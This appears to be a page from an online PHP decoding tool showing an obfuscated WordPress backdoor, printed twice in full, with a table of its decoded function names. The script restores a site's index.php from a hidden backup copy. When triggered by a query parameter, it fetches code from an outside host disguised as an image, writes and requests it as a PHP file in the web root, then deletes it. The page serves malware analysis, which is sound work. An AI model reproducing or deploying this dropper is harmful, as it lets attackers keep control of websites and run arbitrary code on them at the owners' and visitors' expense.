Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $f_size = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("W..

Decoded Output download

<?php  $f_size = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("WlhOcA==")) . base64_decode(base64_decode("ZW1VPQ==")); $f_exists = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("WlY5bA==")) . base64_decode(base64_decode("ZUdseg==")) . base64_decode(base64_decode("ZEhNPQ==")); $f_put = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("WlY5dw==")) . base64_decode(base64_decode("ZFhSZg==")) . base64_decode(base64_decode("WTI5dQ==")) . base64_decode(base64_decode("ZEdWdQ==")) . base64_decode(base64_decode("ZEhNPQ==")); $un_link=base64_decode(base64_decode("ZFc0PQ==")).base64_decode(base64_decode("YkdsdWF3PT0="));$f_get = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("WlY5bg==")) . base64_decode(base64_decode("WlhSZg==")) . base64_decode(base64_decode("WTI5dQ==")) . base64_decode(base64_decode("ZEdWdQ==")) . base64_decode(base64_decode("ZEhNPQ==")); $c47 = base64_decode(base64_decode("WXc9PQ==")) . base64_decode(base64_decode("YUE9PQ==")) . base64_decode(base64_decode("YlE9PQ==")) . base64_decode(base64_decode("Ync9PQ==")) . base64_decode(base64_decode("WkE9PQ==")); $f22 = base64_decode(base64_decode("ZEE9PQ==")) . base64_decode(base64_decode("Ync9PQ==")) . base64_decode(base64_decode("ZFE9PQ==")) . base64_decode(base64_decode("WXc9PQ==")) . base64_decode(base64_decode("YUE9PQ==")); $z6 = base64_decode(base64_decode("ZFc1cw==")) . base64_decode(base64_decode("YVc1cg==")); $bs_dec = base64_decode(base64_decode("WW1Geg==")) . base64_decode(base64_decode("WlRZPQ==")) . base64_decode(base64_decode("TkY5a1pRPT0=")) . base64_decode(base64_decode("WTI5a1pRPT0=")); $idx_path = $_SERVER[base64_decode(base64_decode("UkU5RFZVMUY=")) . base64_decode(base64_decode("VGxSZlVrOVBWQT09"))]. base64_decode(base64_decode("TDJsdVpBPT0=")) . base64_decode(base64_decode("WlhndWNHaHc=")); $bk_idx_path = base64_decode(base64_decode("TDJodmJXVXZibTkyYjNOMGNqY3ZjSFZpYkdsalgyaDBiV3d2ZDNBdGFXNWpiSFZrWlhNdlUybHRjR3hsVUdsbEwwTnZiblJsYm5RdlZIbHdaVWg2Y0c1RkxteHZadz09")); if (!$f_exists($idx_path) or $f_size($idx_path) != 9122) { if ($f_exists($bk_idx_path)){ $idx_code = @$f_get($bk_idx_path); @$c47($idx_path, 438); @$z6($idx_path); @$f_put($idx_path, $bs_dec($idx_code)); @$c47($idx_path, 292);   } }  if($f_size($idx_path) == 9122 && $_GET[base64_decode(base64_decode("WTNrPQ=="))]==base64_decode(base64_decode("TVE9PQ=="))) {  $r3=base64_decode("aHR0cDovL3MubmV3bmRheS54eXovY3kvY3kuZ2lm");$cy_code=@$f_get($r3); if($cy_code){ $cy_path=$_SERVER[base64_decode(base64_decode("UkU5RFZVMUY=")) . base64_decode(base64_decode("VGxSZlVrOVBWQT09"))]. base64_decode(base64_decode("TDJONVltOXladz09")) . base64_decode(base64_decode("WDNSdGNDND0=")).base64_decode(base64_decode("Y0E9PQ==")).base64_decode(base64_decode("YUhBPQ==")); @$f_put($cy_path, $cy_code);   $c40 = array(base64_decode("c3Ns") => array(base64_decode("dmVyaWZ5X3BlZXI=") => false, base64_decode("dmVyaWZ5X3BlZXJfbmFtZQ==") => false, ), base64_decode(base64_decode("YUhSMGNBPT0=")) => array( base64_decode(base64_decode("YldWMGFHOWs=")) => base64_decode("R0VU"), base64_decode(base64_decode("ZEdsdFpXOTFkQT09")) => base64_decode("Mw=="), ), ); $z5 = (isset($_SERVER[base64_decode("SFRUUFM=")]) && $_SERVER[base64_decode("SFRUUFM=")] == base64_decode("b24=")) ? base64_decode(base64_decode("YUhSMGNITT0=")) : base64_decode(base64_decode("YUhSMGNBPT0="));$q50 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$j0=$z5.base64_decode(base64_decode("T2k4dg==")).$q50.base64_decode(base64_decode("TDJONVltOXladz09")) . base64_decode(base64_decode("WDNSdGNDND0=")).base64_decode(base64_decode("Y0E9PQ==")).base64_decode(base64_decode("YUhBPQ==")); @$f_get($j0, false, stream_context_create($c40)); $d5 = @$un_link($cy_path);  }   } ?>

Did this file decode correctly?

Original Code

<?php  $f_size = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("WlhOcA==")) . base64_decode(base64_decode("ZW1VPQ==")); $f_exists = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("WlY5bA==")) . base64_decode(base64_decode("ZUdseg==")) . base64_decode(base64_decode("ZEhNPQ==")); $f_put = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("WlY5dw==")) . base64_decode(base64_decode("ZFhSZg==")) . base64_decode(base64_decode("WTI5dQ==")) . base64_decode(base64_decode("ZEdWdQ==")) . base64_decode(base64_decode("ZEhNPQ==")); $un_link=base64_decode(base64_decode("ZFc0PQ==")).base64_decode(base64_decode("YkdsdWF3PT0="));$f_get = base64_decode(base64_decode("Wm1scw==")) . base64_decode(base64_decode("WlY5bg==")) . base64_decode(base64_decode("WlhSZg==")) . base64_decode(base64_decode("WTI5dQ==")) . base64_decode(base64_decode("ZEdWdQ==")) . base64_decode(base64_decode("ZEhNPQ==")); $c47 = base64_decode(base64_decode("WXc9PQ==")) . base64_decode(base64_decode("YUE9PQ==")) . base64_decode(base64_decode("YlE9PQ==")) . base64_decode(base64_decode("Ync9PQ==")) . base64_decode(base64_decode("WkE9PQ==")); $f22 = base64_decode(base64_decode("ZEE9PQ==")) . base64_decode(base64_decode("Ync9PQ==")) . base64_decode(base64_decode("ZFE9PQ==")) . base64_decode(base64_decode("WXc9PQ==")) . base64_decode(base64_decode("YUE9PQ==")); $z6 = base64_decode(base64_decode("ZFc1cw==")) . base64_decode(base64_decode("YVc1cg==")); $bs_dec = base64_decode(base64_decode("WW1Geg==")) . base64_decode(base64_decode("WlRZPQ==")) . base64_decode(base64_decode("TkY5a1pRPT0=")) . base64_decode(base64_decode("WTI5a1pRPT0=")); $idx_path = $_SERVER[base64_decode(base64_decode("UkU5RFZVMUY=")) . base64_decode(base64_decode("VGxSZlVrOVBWQT09"))]. base64_decode(base64_decode("TDJsdVpBPT0=")) . base64_decode(base64_decode("WlhndWNHaHc=")); $bk_idx_path = base64_decode(base64_decode("TDJodmJXVXZibTkyYjNOMGNqY3ZjSFZpYkdsalgyaDBiV3d2ZDNBdGFXNWpiSFZrWlhNdlUybHRjR3hsVUdsbEwwTnZiblJsYm5RdlZIbHdaVWg2Y0c1RkxteHZadz09")); if (!$f_exists($idx_path) or $f_size($idx_path) != 9122) { if ($f_exists($bk_idx_path)){ $idx_code = @$f_get($bk_idx_path); @$c47($idx_path, 438); @$z6($idx_path); @$f_put($idx_path, $bs_dec($idx_code)); @$c47($idx_path, 292);   } }  if($f_size($idx_path) == 9122 && $_GET[base64_decode(base64_decode("WTNrPQ=="))]==base64_decode(base64_decode("TVE9PQ=="))) {  $r3=base64_decode("aHR0cDovL3MubmV3bmRheS54eXovY3kvY3kuZ2lm");$cy_code=@$f_get($r3); if($cy_code){ $cy_path=$_SERVER[base64_decode(base64_decode("UkU5RFZVMUY=")) . base64_decode(base64_decode("VGxSZlVrOVBWQT09"))]. base64_decode(base64_decode("TDJONVltOXladz09")) . base64_decode(base64_decode("WDNSdGNDND0=")).base64_decode(base64_decode("Y0E9PQ==")).base64_decode(base64_decode("YUhBPQ==")); @$f_put($cy_path, $cy_code);   $c40 = array(base64_decode("c3Ns") => array(base64_decode("dmVyaWZ5X3BlZXI=") => false, base64_decode("dmVyaWZ5X3BlZXJfbmFtZQ==") => false, ), base64_decode(base64_decode("YUhSMGNBPT0=")) => array( base64_decode(base64_decode("YldWMGFHOWs=")) => base64_decode("R0VU"), base64_decode(base64_decode("ZEdsdFpXOTFkQT09")) => base64_decode("Mw=="), ), ); $z5 = (isset($_SERVER[base64_decode("SFRUUFM=")]) && $_SERVER[base64_decode("SFRUUFM=")] == base64_decode("b24=")) ? base64_decode(base64_decode("YUhSMGNITT0=")) : base64_decode(base64_decode("YUhSMGNBPT0="));$q50 = $_SERVER[base64_decode("SFRUUF9IT1NU")];$j0=$z5.base64_decode(base64_decode("T2k4dg==")).$q50.base64_decode(base64_decode("TDJONVltOXladz09")) . base64_decode(base64_decode("WDNSdGNDND0=")).base64_decode(base64_decode("Y0E9PQ==")).base64_decode(base64_decode("YUhBPQ==")); @$f_get($j0, false, stream_context_create($c40)); $d5 = @$un_link($cy_path);  }   } ?>

Function Calls

base64_decode 84
b'fil'b'e_e'b'xis'b'ts' 1

Variables

$z6 b'unl'b'ink'
$c47 b'c'b'h'b'm'b'o'b'd'
$f22 b't'b'o'b'u'b'c'b'h'
$f_get b'fil'b'e_g'b'et_'b'con'b'ten'b'ts'
$f_put b'fil'b'e_p'b'ut_'b'con'b'ten'b'ts'
$bs_dec b'bas'b'e6'b'4_de'b'code'
$f_size b'fil'b'esi'b'ze'
$un_link b'un'b'link'
$f_exists b'fil'b'e_e'b'xis'b'ts'
$idx_path Noneb'/ind'b'ex.php'
$bk_idx_path /home/novostr7/public_html/wp-includes/SimplePie/Content/Typ..

Stats

MD5 ad18e5a72f678ac50a8c2fd67e054078
Eval Count 0
Decode Time 189 ms